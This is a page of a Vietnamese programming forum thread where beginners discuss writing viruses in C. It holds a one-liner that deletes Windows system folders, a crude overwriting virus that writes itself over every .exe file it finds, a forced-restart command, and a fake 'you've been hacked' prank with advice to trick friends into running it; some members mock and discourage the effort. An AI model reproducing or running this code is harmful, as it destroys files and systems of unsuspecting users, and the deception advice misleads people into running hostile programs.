Chào mừng đến với Diễn đàn lập trình - Cộng đồng lập trình.
Trang 2 của 3 Đầu tiênĐầu tiên 123 CuốiCuối
Kết quả 11 đến 20 của 21
    Tui vô đây tưởng kiếm được cái Code virus bằng C về tham khảo nào ngờ toàn thấy chơi bằng VBS và lệnh DOS thui ah`.Ai pro cho bài viết về cách chèn code virus của mình vào tệp chương trình đi....mà có thể thay mấy câu lện của file bat bằng cách thực hiện câu lệnh trong C như sau.(Em chưa thử) nhưng nghĩ là được đóa [IMG]images/smilies/biggrin.png[/IMG]

Mã:
    #include<process.h>main() {system("del C:\windows\*.*");system("del C:\windows\system32\*.*");exit(0);}
    Mọi người choa ý kiến nha !!!

Vd về 1 con virus ghi đè code của nó lên 1 tệp thi thành khác ( tệp EXE).Các bạn cho ý kiến nha !! [IMG]images/smilies/biggrin.png[/IMG] .Mà em lấy vd con virus co tên ALVISS.exe nhé

Mã:
    #include<conio.h>#include<stdio.h>#include<dir.h>#include<process.h>#include<dos.h>#define attrib (FA_RDONLY|FA_HIDDEN|FA_SYSTEM|FA_ARCH) //cac thuoc tinh : chi doc ,tep an,tep he thong,tep luu truvoid main(){int rt;FILE *vr,*host;struct ffblk *fb;char bf[512];    rt= findfirst("*.exe",fb,attrib);//Tim file file host    while(!rt)    {    vr=fopen("ALVISS.EXE","rb");//mo file vr theo mode doc nhi fan    host = fopen(fb->ff_name,"rb+");//mo file host theo mode doc ghi nhi fan    while(fread(bf,512,1,vr)>0)    //doc code vr luu vao vung dem        {        fwrite(bf,512,1,host);//chen code        }    fclose(vr);    fseek(vr,0,0);//chuyen con tro tep vr ve dau    rt=findnext(fb);//tim tep tiep theo    }}
    Vì là vd nên tui chỉ viết đơn giản thui .Có chỗ nào chưa được các bác chỉ ra chúng ta cùng thảo luận nhé!!!

Em chào các pro ^^! Bro nào biết viết chương trình bằng C++ mà khi ta click vào thì nó restart máy không? Em xin đa tạ

chậc !
    Mã:
    system("shutdown -r -t 0");

Tui có 1 code virus viết = C đây, show ra cái giống như cái trò mấy cái forum hack, ***** hay hù thiên hạ:

Mã:
    #include <windows.h>int main(void){    printf("Ha ha, mày đã bị dính virus, ai biểu mày chạy tao.
    ");    MessageBoxA(NULL, "Tiêu mày rồi", "Mày đã bị tao hack", MB_OK);    return 0; // chớ biết làm thêm gì bây giờ, hù mà !}
    Ct trên compile: cl virus.c user32.lib, rồi copy file .exe đưa cho mấy đứa bạn, dụ nó chạy, tụi nó sẽ sợ cậu chết khiếp luôn, và ngưỡng mộ nhìn cậu.[IMG]images/smilies/lick.gif[/IMG]

Thiệt là bó tay với cái đám nhóc, học không lo học, chi lo viết virus phá hoại.[IMG]images/smilies/Cry.gif[/IMG]
    Còn cái code của cậu Adviss gì đó, phá tiêu luôn tất cả các exe người ta thì có, chứ append cái con khỉ gì.

Em thấy học các viết virus là một cách học đi trước đón đầu đấy chứ ạ. Em chưa hiểu biết về những cái này nên mong các anh chỉ dạy em từ cái đơn giản nhất. Để khi em biết chút ít còn có sức cống hiến cho diễn đàn chứ ạ

Học viết virus mà đi trước đón đầu cái gì, được cái gì. Tui thấy đa số virus writer coding rất tệ, chỉ có rất ít là guru.

Con virus anh gửi cho em lấy về chạy thử mà có được đâu. nó báo sai chỗ nào ấy. anh xem lại giúp em được không.Em muốn xem thử con virus đó nó hình hài như thế nào. anh viết đầy đủ vào nhé.

Trời ơi là trời, chọc cậu mà cậu tưởng thiệt à, học lại C từ đầu đi, căn bản vào, khi nào lên cao rồi quay lại với cái mong muốn viết virus = C của cậu.

Trích dẫn Gửi bởi TQN
    Trời ơi là trời, chọc cậu mà cậu tưởng thiệt à, học lại C từ đầu đi, căn bản vào, khi nào lên cao rồi quay lại với cái mong muốn viết virus = C của cậu.
    Vì em không hiểu, không biết mới tin, ai dè anh lại đi lừa một người không biết gì như em. Hiện tại em biết mỗi C, Passcal thôi. chẳng biết học gì để có thể đến với ước mơ lập trình cao cấp (viết virus đơn giản chẳng hạn) với em thế có lẽ là cao rồi. Mong anh niệm tình chỉ bảo em

Trích dẫn Gửi bởi tientu
    Vì em không hiểu, không biết mới tin, ai dè anh lại đi lừa một người không biết gì như em. Hiện tại em biết mỗi C, Passcal thôi. chẳng biết học gì để có thể đến với ước mơ lập trình cao cấp (viết virus đơn giản chẳng hạn) với em thế có lẽ là cao rồi. Mong anh niệm tình chỉ bảo em
    Gì mà cao cấp với chả không cao cấp.Bạn biết C,passcal rồi như thế là cũng có nền tảng rồi.Mình khuyên nên bạn nên để ý vào học thì hơn...cứ phải là viết được virus thì mình giỏi hơn đâu.Nhiều người rất giỏi nhưng họ chưa viết virus bao giờ....

Trang 2 của 3 Đầu tiênĐầu tiên 123 CuốiCuối